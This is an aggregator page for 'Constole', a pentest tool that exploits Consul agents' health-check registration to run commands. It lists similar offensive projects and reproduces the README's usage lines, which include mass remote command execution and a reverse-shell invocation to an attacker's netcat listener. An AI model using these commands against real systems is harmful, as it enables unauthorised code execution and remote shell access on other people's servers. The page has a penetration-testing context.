GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → TestingPens → Constole

TestingPens / Constole

Licence: other
Scan for and exploit Consul agents

Programming Languages

python
139335 projects - #7 most used programming language

Labels

consulpython-scriptpentestsecurity-scannerpentest-scriptssecurity-toolsredteampentesting-tools

Projects that are alternatives of or similar to Constole

NIST-to-Tech
An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (+64.86%)
Mutual labels:  pentest, redteam, pentesting-tools
conti-pentester-guide-leak
Leaked pentesting manuals given to Conti ransomware crooks
Stars: ✭ 772 (+1986.49%)
Mutual labels:  pentest-scripts, pentesting-tools
Hackers Tool Kit
Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff i now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy to see updates check on my instagram @tuf_unkn0wn or if there are any problems message me on instagram
Stars: ✭ 211 (+470.27%)
Mutual labels:  python-script, pentest
dirbpy
This is the new version of dirb in python
Stars: ✭ 36 (-2.7%)
Mutual labels:  python-script, security-scanner
Pentest-Bookmarkz
A collection of useful links for Pentesters
Stars: ✭ 118 (+218.92%)
Mutual labels:  pentest, pentesting-tools
Doxycannon
A poorman's proxycannon and botnet, using docker, ovpn files, and a dante socks5 proxy
Stars: ✭ 216 (+483.78%)
Mutual labels:  pentest, redteam
Some Pentesters SecurityResearchers RedTeamers
Some Pentesters, Security Researchers, Red Teamers which i learned from them a lot...
Stars: ✭ 60 (+62.16%)
Mutual labels:  redteam, pentesting-tools
Pentest
some pentest scripts & tools by [email protected]
Stars: ✭ 136 (+267.57%)
Mutual labels:  pentest, pentest-scripts
wifi-pentesting-guide
WiFi Penetration Testing Guide
Stars: ✭ 105 (+183.78%)
Mutual labels:  pentest-scripts, pentesting-tools
HellgateLoader CSharp
Load shellcode via HELLGATE, Rewrite hellgate with .net framework for learning purpose.
Stars: ✭ 73 (+97.3%)
Mutual labels:  pentest, redteam
1earn
ffffffff0x 团队维护的安全知识框架,内容包括不仅限于 web安全、工控安全、取证、应急、蓝队设施部署、后渗透、Linux安全、各类靶机writup
Stars: ✭ 3,715 (+9940.54%)
Mutual labels:  pentest, redteam
Ladon
大型内网渗透扫描器&Cobalt Strike,Ladon8.9内置120个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),远程执行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降权提权Runas、GetSystem,Poc/Exploit,支持Cobalt Strike 3.X-4.0
Stars: ✭ 2,911 (+7767.57%)
Mutual labels:  pentest, security-scanner
Aboutsecurity
A list of payload and bypass lists for penetration testing and red team infrastructure build.
Stars: ✭ 166 (+348.65%)
Mutual labels:  pentest, redteam
Shodansploit
🔎 shodansploit > v1.3.0
Stars: ✭ 342 (+824.32%)
Mutual labels:  python-script, security-scanner
Passcat
Passwords Recovery Tool
Stars: ✭ 164 (+343.24%)
Mutual labels:  pentest, redteam
argus
Argus Advanced Remote & Local Keylogger For macOS and Windows
Stars: ✭ 87 (+135.14%)
Mutual labels:  pentest, pentesting-tools
Wsmanager
Webshell Manager
Stars: ✭ 99 (+167.57%)
Mutual labels:  pentest, redteam
Collection Document
Collection of quality safety articles. Awesome articles.
Stars: ✭ 1,387 (+3648.65%)
Mutual labels:  pentest, redteam
Gopher
C# tool to discover low hanging fruits
Stars: ✭ 73 (+97.3%)
Mutual labels:  redteam, pentesting-tools
volana
🌒 Shell command obfuscation to avoid detection systems
Stars: ✭ 38 (+2.7%)
Mutual labels:  pentest, redteam
View All Similar Projects ➔

Overview

Scan for Consul agents and exploit them to gain shell. I've been messing around with Consul and while reading the API, found the service registration endpoint. Registrations feature check functionality, which is typically used to provide health checks on nodes. A check can be an external application or script, which performs some kind of health check and provides some form of output. Essentially, this can be any script you define to run at certain time intervals.

Setup

pip install -r requirements.txt

Usage

To scan for hosts running vulnerable Consul agent services, you can provide an comma-separated list with host:port,host:port,...,etc or an input file (1 target per line).

python constole.py --targets '10.50.30.1:8500,10.50.30.2:8500'
python constole.py --infile mytargets.txt

Remote Code Execution can be achieved across multiple hosts as follows:

python constole.py --infile mytargets.txt --cmd 'my command to run' --exploit

To obtain a reverse shell from the vulnerable host, start a netcat listener on your desired port and select a single target:

python constole.py --targets 10.50.30.1:8500 --lhost my_ip_address --lport my_listening_nc_port --exploit

Note that Constole will automatically try to deregister the service, after a time period, to assist in clean up during testing.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].